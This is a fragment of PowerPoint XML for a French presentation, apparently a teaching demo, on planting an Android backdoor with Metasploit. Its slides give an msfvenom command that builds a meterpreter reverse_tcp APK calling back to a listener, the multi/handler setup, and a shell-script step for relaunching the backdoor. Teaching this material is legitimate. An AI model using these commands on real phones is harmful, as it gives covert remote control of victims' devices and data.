              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sdcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/DCIM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	sh anything.sh </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>	Fermer le  terminal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24865">
            <a:off x="4034610" y="-2104590"/>
            <a:ext cx="4987148" cy="37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595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Démo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23816">
            <a:off x="-242455" y="-701386"/>
            <a:ext cx="1870364" cy="14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2"/>
            <a:ext cx="12194977" cy="685632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697187" y="5018810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38260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5645" y="1403604"/>
            <a:ext cx="7315200" cy="40416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Qu’est ce que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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Qu’est ce qu’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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Le plus d’Android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En quoi cela va-t-il nous servir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Mise en place du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor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Handler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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Payload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Paramètres de connexion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Liste des commandes exécutables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Relance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor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Démo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     Questions / Réponses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47" y="5759996"/>
            <a:ext cx="2928010" cy="21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 ce que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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5530">
            <a:off x="10283535" y="6130633"/>
            <a:ext cx="2632364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Qu’est ce qu’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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35493" flipH="1">
            <a:off x="-706581" y="-955963"/>
            <a:ext cx="2230581" cy="16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plus d’Android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50396">
            <a:off x="9624211" y="5831742"/>
            <a:ext cx="2313709" cy="173528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306015" y="3295537"/>
            <a:ext cx="6843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Android utilise le noyau de Linux, il est ouvert et open source. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Android est donc une version supplémentaire de Linux un peu comme </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ubuntu, Debian etc…  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Il n’est pas un système Linux dans le sens strict du terme.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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306015" y="2291288"/>
            <a:ext cx="690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 faut-il retenir ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22565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 quoi cela va-t-il nous servir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6109853"/>
            <a:ext cx="2299855" cy="17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les grandes lignes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77" y="4162815"/>
            <a:ext cx="803292" cy="14894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45" y="1123837"/>
            <a:ext cx="848756" cy="1123753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25215979"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5143501" y="352058"/>
          <a:ext cx="2836718" cy="26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9219" y="1123837"/>
            <a:ext cx="1224395" cy="112375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4977245" y="2493818"/>
            <a:ext cx="3002974" cy="158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19911311">
            <a:off x="4900833" y="2986795"/>
            <a:ext cx="2861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Envoie du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> au téléphone portable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5143501" y="4458007"/>
            <a:ext cx="2836718" cy="89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Post exploitation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9219" y="4162814"/>
            <a:ext cx="2237945" cy="148946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869763">
            <a:off x="9244444" y="-878032"/>
            <a:ext cx="2341418" cy="17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du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>backdoor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dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> LHOST=10.100.254.240 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>=4444 R &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>app.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Génération de l’APK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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5073">
            <a:off x="3300843" y="5847194"/>
            <a:ext cx="2345268" cy="17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Handler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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> &gt; use exploit/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1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1600" dirty="0"/>
              <a:t>Sous-programme qui permet la gestion de certaines opérations à l'intérieur du système d'exploitation, comme le déplacement de données ou la correction d'erreurs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86983">
            <a:off x="8231280" y="5394632"/>
            <a:ext cx="3700050" cy="27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523</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>90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Frame</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Sommaire</vt:lpstr>
      <vt:lpstr>Qu’est ce que Metasploit ?</vt:lpstr>
      <vt:lpstr>Qu’est ce qu’un backdoor ?</vt:lpstr>
      <vt:lpstr>Le plus d’Android</vt:lpstr>
      <vt:lpstr>En quoi cela va-t-il nous servir ?</vt:lpstr>
      <vt:lpstr>Dans les grandes lignes</vt:lpstr>
      <vt:lpstr>Mise en place du backdoor</vt:lpstr>
      <vt:lpstr>Handler</vt:lpstr>
      <vt:lpstr>Payload</vt:lpstr>
      <vt:lpstr>Paramètres de connexion</vt:lpstr>
      <vt:lpstr>Liste des commandes</vt:lpstr>
      <vt:lpstr>Relance backdoor</vt:lpstr>
      <vt:lpstr>Démo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loic destefano</cp:lastModifiedBy>
  <cp:revision>73</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-08-26T23:50:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-23T11:33:58Z</dcterms:modified>
</cp:coreProperties>
</file>